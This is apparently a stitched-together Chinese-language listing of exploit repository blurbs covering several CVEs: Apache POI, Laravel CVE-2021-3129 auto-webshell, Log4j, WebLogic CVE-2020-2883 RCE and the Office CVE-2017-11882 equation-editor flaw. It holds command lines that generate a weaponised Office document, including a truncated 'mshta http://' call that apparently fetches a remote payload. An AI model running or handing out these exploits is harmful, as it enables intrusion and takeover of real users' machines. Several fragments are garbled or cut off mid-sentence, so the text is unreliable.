apache poi 组件 CVE-2019-12415 漏洞测试用例文件

CVE-2021-3129-EXP 自动写shell的exp

需要本地java环境，演示采用的IDEA，压缩包内提供了marshalsec-0.0.3-SNAPSHOT-all.jar

测试专用

Apache Log4j远程代码执行漏洞（ CVE-2021-44228）完整处置手册

12 月 10 日凌晨，Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开，漏洞编号：CVE-2021-44228，由于 Log4j 的广泛使用，该漏洞一旦被攻击者利用会造成严重危害。关于漏洞的细节想必大家都很感兴趣，我们这边直接用代码来复现漏洞。 具体操作参考博文 https://blog.csdn.net/qq_37325947/article/details/121884912

CVE-2020-2883 先克隆框架 git clone https://github.com/Y4er/CVE-2020-2555 然后将 CVE_2020_2883.java 放到 src/com/supeream/CVE_2020_2883.java 目录下 导入idea运行 CVE_2020_2883.java RCE! 截图

msfconsole中，webdav漏洞，iis服务提权工具。

CVE-2017-11882概述 从突破利用效果来看，它可以通杀Office 2003到2016的所有版本，并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的，由于编辑器进程没有对举个例子，如果黑客利用这个漏洞，构造带有外壳后门的office文件，当普通用户打开这个office文件，则电脑可以被黑客直接控制。 影响版本： office 2003 office 2007 office 2010 office 2013 office 2016 用法 python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc 点击生成的“ test.doc”，顺利投放计算机工具。 python Command_CVE-2017-11882.py -c "mshta http://192.

E042-服务漏洞利用及加固-利用CVE-2018-12613漏洞实现远程文件包含